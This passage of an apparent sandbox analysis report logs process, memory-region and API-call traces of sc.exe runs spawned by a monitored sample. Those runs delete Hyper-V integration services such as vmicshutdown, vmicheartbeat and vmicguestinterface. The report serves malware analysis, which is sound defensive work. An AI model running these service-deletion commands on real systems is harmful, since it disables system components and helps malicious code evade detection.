"pagefile_0x0000008e19e70000" filename = "" Region: id = 4879 start_va = 0x8e19e80000 end_va = 0x8e19e86fff entry_point = 0x0 region_type = private name = "private_0x0000008e19e80000" filename = "" Region: id = 4880 start_va = 0x8e19f60000 end_va = 0x8e1a01dfff entry_point = 0x8e19f60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4881 start_va = 0x8e1a020000 end_va = 0x8e1a09ffff entry_point = 0x0 region_type = private name = "private_0x0000008e1a020000" filename = "" Region: id = 4882 start_va = 0x8e1a280000 end_va = 0x8e1a28ffff entry_point = 0x0 region_type = private name = "private_0x0000008e1a280000" filename = "" Region: id = 4883 start_va = 0x7ff67a530000 end_va = 0x7ff67a62ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a530000" filename = "" Region: id = 4884 start_va = 0x7ff67a65c000 end_va = 0x7ff67a65dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a65c000" filename = "" Region: id = 4885 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4886 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4889 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4890 start_va = 0x8e1a0a0000 end_va = 0x8e1a0a6fff entry_point = 0x0 region_type = private name = "private_0x0000008e1a0a0000" filename = "" Region: id = 4891 start_va = 0x8e1a0b0000 end_va = 0x8e1a0c1fff entry_point = 0x8e1a0b0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 5 os_tid = 0x4d0 [0072.992] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0072.992] __set_app_type (_Type=0x1) [0072.992] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0072.992] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0072.992] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.142] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.142] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0073.142] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0073.142] _wcsicmp (_String1="delete", _String2="query") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="start") returned -15 [0073.142] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0073.142] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0073.142] _wcsicmp (_String1="delete", _String2="control") returned 1 [0073.142] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0073.142] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0073.142] _wcsicmp (_String1="delete", _String2="config") returned 1 [0073.142] _wcsicmp (_String1="delete", _String2="description") returned -7 [0073.142] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0073.142] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0073.142] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0073.142] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0073.142] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0073.142] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0073.142] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0073.142] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0073.142] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0073.142] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0073.143] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0073.143] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0073.144] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x8e1a118970 [0073.149] OpenServiceW (hSCManager=0x8e1a118970, lpServiceName="vmickvpexchange", dwDesiredAccess=0x10000) returned 0x8e1a118c10 [0073.150] DeleteService (hService=0x8e1a118c10) returned 1 [0073.152] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x8e19f2f730, nSize=0x2, Arguments=0x8e19f2f7b0 | out: lpBuffer="삐ᨑ\x8e") returned 0x1c [0073.153] GetFileType (hFile=0x24) returned 0x2 [0073.153] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x8e19f2f6e0 | out: lpMode=0x8e19f2f6e0) returned 1 [0073.204] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x8e1a11c090*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x8e19f2f6d8, lpReserved=0x0 | out: lpBuffer=0x8e1a11c090*, lpNumberOfCharsWritten=0x8e19f2f6d8*=0x1c) returned 1 [0073.204] LocalFree (hMem=0x8e1a11c090) returned 0x0 [0073.204] LocalFree (hMem=0x0) returned 0x0 [0073.204] CloseServiceHandle (hSCObject=0x8e1a118c10) returned 1 [0073.205] CloseServiceHandle (hSCObject=0x8e1a118970) returned 1 [0073.205] LocalFree (hMem=0x0) returned 0x0 [0073.205] exit (_Code=0) Thread: id = 316 os_tid = 0x1220 Process: id = "5" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe223000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmicguestinterface\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 234 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 235 start_va = 0x5e92280000 end_va = 0x5e9229ffff entry_point = 0x0 region_type = private name = "private_0x0000005e92280000" filename = "" Region: id = 236 start_va = 0x5e922a0000 end_va = 0x5e922b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e922a0000" filename = "" Region: id = 237 start_va = 0x5e922c0000 end_va = 0x5e9233ffff entry_point = 0x0 region_type = private name = "private_0x0000005e922c0000" filename = "" Region: id = 238 start_va = 0x5e92340000 end_va = 0x5e92343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e92340000" filename = "" Region: id = 239 start_va = 0x5e92350000 end_va = 0x5e92350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e92350000" filename = "" Region: id = 240 start_va = 0x5e92360000 end_va = 0x5e92361fff entry_point = 0x0 region_type = private name = "private_0x0000005e92360000" filename = "" Region: id = 241 start_va = 0x7df5ff540000 end_va = 0x7ff5ff53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff540000" filename = "" Region: id = 242 start_va = 0x7ff67a460000 end_va = 0x7ff67a482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a460000" filename = "" Region: id = 243 start_va = 0x7ff67a48d000 end_va = 0x7ff67a48efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a48d000" filename = "" Region: id = 244 start_va = 0x7ff67a48f000 end_va = 0x7ff67a48ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a48f000" filename = "" Region: id = 245 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 246 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 429 start_va = 0x5e92380000 end_va = 0x5e9247ffff entry_point = 0x0 region_type = private name = "private_0x0000005e92380000" filename = "" Region: id = 430 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 431 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3872 start_va = 0x5e92280000 end_va = 0x5e9228ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e92280000" filename = "" Region: id = 3873 start_va = 0x5e92290000 end_va = 0x5e92296fff entry_point = 0x0 region_type = private name = "private_0x0000005e92290000" filename = "" Region: id = 3874 start_va = 0x5e92480000 end_va = 0x5e9253dfff entry_point = 0x5e92480000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3875 start_va = 0x5e92540000 end_va = 0x5e925bffff entry_point = 0x0 region_type = private name = "private_0x0000005e92540000" filename = "" Region: id = 3876 start_va = 0x5e92640000 end_va = 0x5e9264ffff entry_point = 0x0 region_type = private name = "private_0x0000005e92640000" filename = "" Region: id = 3877 start_va = 0x7ff67a360000 end_va = 0x7ff67a45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a360000" filename = "" Region: id = 3878 start_va = 0x7ff67a48b000 end_va = 0x7ff67a48cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a48b000" filename = "" Region: id = 3879 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3880 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3890 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3891 start_va = 0x5e92370000 end_va = 0x5e92376fff entry_point = 0x0 region_type = private name = "private_0x0000005e92370000" filename = "" Region: id = 3892 start_va = 0x5e925c0000 end_va = 0x5e925d1fff entry_point = 0x5e925c0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 6 os_tid = 0xa38 [0066.063] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0066.063] __set_app_type (_Type=0x1) [0066.063] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0066.063] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0066.063] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.262] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.262] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0066.262] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0066.262] _wcsicmp (_String1="delete", _String2="query") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="start") returned -15 [0066.262] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0066.262] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0066.262] _wcsicmp (_String1="delete", _String2="control") returned 1 [0066.262] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0066.262] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0066.262] _wcsicmp (_String1="delete", _String2="config") returned 1 [0066.262] _wcsicmp (_String1="delete", _String2="description") returned -7 [0066.262] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0066.262] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0066.262] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0066.262] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0066.262] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0066.262] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0066.262] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0066.262] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0066.262] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0066.262] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0066.262] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0066.262] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0066.264] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5e92388c40 [0066.268] OpenServiceW (hSCManager=0x5e92388c40, lpServiceName="vmicguestinterface", dwDesiredAccess=0x10000) returned 0x5e92388af0 [0066.269] DeleteService (hService=0x5e92388af0) returned 1 [0066.270] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x5e9233f7d0, nSize=0x2, Arguments=0x5e9233f850 | out: lpBuffer="삐鈸^") returned 0x1c [0066.272] GetFileType (hFile=0x24) returned 0x2 [0066.272] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x5e9233f780 | out: lpMode=0x5e9233f780) returned 1 [0066.413] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x5e9238c090*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x5e9233f778, lpReserved=0x0 | out: lpBuffer=0x5e9238c090*, lpNumberOfCharsWritten=0x5e9233f778*=0x1c) returned 1 [0066.413] LocalFree (hMem=0x5e9238c090) returned 0x0 [0066.413] LocalFree (hMem=0x0) returned 0x0 [0066.413] CloseServiceHandle (hSCObject=0x5e92388af0) returned 1 [0066.414] CloseServiceHandle (hSCObject=0x5e92388c40) returned 1 [0066.414] LocalFree (hMem=0x0) returned 0x0 [0066.414] exit (_Code=0) Thread: id = 256 os_tid = 0x1104 Process: id = "6" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe229000" os_pid = "0x4cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmicshutdown\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 247 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 248 start_va = 0xed8e170000 end_va = 0xed8e18ffff entry_point = 0x0 region_type = private name = "private_0x000000ed8e170000" filename = "" Region: id = 249 start_va = 0xed8e190000 end_va = 0xed8e1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ed8e190000" filename = "" Region: id = 250 start_va = 0xed8e1b0000 end_va = 0xed8e22ffff entry_point = 0x0 region_type = private name = "private_0x000000ed8e1b0000" filename = "" Region: id = 251 start_va = 0xed8e230000 end_va = 0xed8e233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ed8e230000" filename = "" Region: id = 252 start_va = 0xed8e240000 end_va = 0xed8e240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ed8e240000" filename = "" Region: id = 253 start_va = 0xed8e250000 end_va = 0xed8e251fff entry_point = 0x0 region_type = private name = "private_0x000000ed8e250000" filename = "" Region: id = 254 start_va = 0x7df5fffd0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffd0000" filename = "" Region: id = 255 start_va = 0x7ff679f70000 end_va = 0x7ff679f92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679f70000" filename = "" Region: id = 256 start_va = 0x7ff679f9d000 end_va = 0x7ff679f9efff entry_point = 0x0 region_type = private name = "private_0x00007ff679f9d000" filename = "" Region: id = 257 start_va = 0x7ff679f9f000 end_va = 0x7ff679f9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff679f9f000" filename = "" Region: id = 258 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 259 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 435 start_va = 0xed8e2e0000 end_va = 0xed8e3dffff entry_point = 0x0 region_type = private name = "private_0x000000ed8e2e0000" filename = "" Region: id = 436 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 437 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3931 start_va = 0xed8e170000 end_va = 0xed8e17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ed8e170000" filename = "" Region: id = 3932 start_va = 0xed8e180000 end_va = 0xed8e186fff entry_point = 0x0 region_type = private name = "private_0x000000ed8e180000" filename = "" Region: id = 3933 start_va = 0xed8e260000 end_va = 0xed8e2dffff entry_point = 0x0 region_type = private name = "private_0x000000ed8e260000" filename = "" Region: id = 3934 start_va = 0xed8e3e0000 end_va = 0xed8e49dfff entry_point = 0xed8e3e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3935 start_va = 0xed8e620000 end_va = 0xed8e62ffff entry_point = 0x0 region_type = private name = "private_0x000000ed8e620000" filename = "" Region: id = 3936 start_va = 0x7ff679e70000 end_va = 0x7ff679f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679e70000" filename = "" Region: id = 3937 start_va = 0x7ff679f9b000 end_va = 0x7ff679f9cfff entry_point = 0x0 region_type = private name = "private_0x00007ff679f9b000" filename = "" Region: id = 3938 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3939 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3954 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3955 start_va = 0xed8e4a0000 end_va = 0xed8e4a6fff entry_point = 0x0 region_type = private name = "private_0x000000ed8e4a0000" filename = "" Region: id = 3956 start_va = 0xed8e4b0000 end_va = 0xed8e4c1fff entry_point = 0xed8e4b0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 7 os_tid = 0x158 [0066.892] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0066.892] __set_app_type (_Type=0x1) [0066.892] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0066.892] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0066.892] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.211] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0067.212] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0067.212] _wcsicmp (_String1="delete", _String2="query") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="start") returned -15 [0067.212] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0067.212] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0067.212] _wcsicmp (_String1="delete", _String2="control") returned 1 [0067.212] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0067.212] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0067.212] _wcsicmp (_String1="delete", _String2="config") returned 1 [0067.212] _wcsicmp (_String1="delete", _String2="description") returned -7 [0067.212] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0067.212] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0067.212] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0067.212] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0067.212] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0067.212] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0067.212] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0067.212] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0067.212] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0067.212] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0067.212] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0067.213] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0067.215] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xed8e2e89b0 [0067.219] OpenServiceW (hSCManager=0xed8e2e89b0, lpServiceName="vmicshutdown", dwDesiredAccess=0x10000) returned 0xed8e2e88c0 [0067.220] DeleteService (hService=0xed8e2e88c0) returned 1 [0067.221] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xed8e22f840, nSize=0x2, Arguments=0xed8e22f8c0 | out: lpBuffer="쁰踮í") returned 0x1c [0067.223] GetFileType (hFile=0x24) returned 0x2 [0067.223] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xed8e22f7f0 | out: lpMode=0xed8e22f7f0) returned 1 [0067.428] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xed8e2ec070*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xed8e22f7e8, lpReserved=0x0 | out: lpBuffer=0xed8e2ec070*, lpNumberOfCharsWritten=0xed8e22f7e8*=0x1c) returned 1 [0067.428] LocalFree (hMem=0xed8e2ec070) returned 0x0 [0067.428] LocalFree (hMem=0x0) returned 0x0 [0067.428] CloseServiceHandle (hSCObject=0xed8e2e88c0) returned 1 [0067.429] CloseServiceHandle (hSCObject=0xed8e2e89b0) returned 1 [0067.429] LocalFree (hMem=0x0) returned 0x0 [0067.429] exit (_Code=0) Thread: id = 262 os_tid = 0x1148 Process: id = "7" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x66d6f000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmicheartbeat\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 260 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 261 start_va = 0xa36db10000 end_va = 0xa36db2ffff entry_point = 0x0 region_type = private name = "private_0x000000a36db10000" filename = "" Region: id = 262 start_va = 0xa36db30000 end_va = 0xa36db43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a36db30000" filename = "" Region: id = 263 start_va = 0xa36db50000 end_va = 0xa36dbcffff entry_point = 0x0 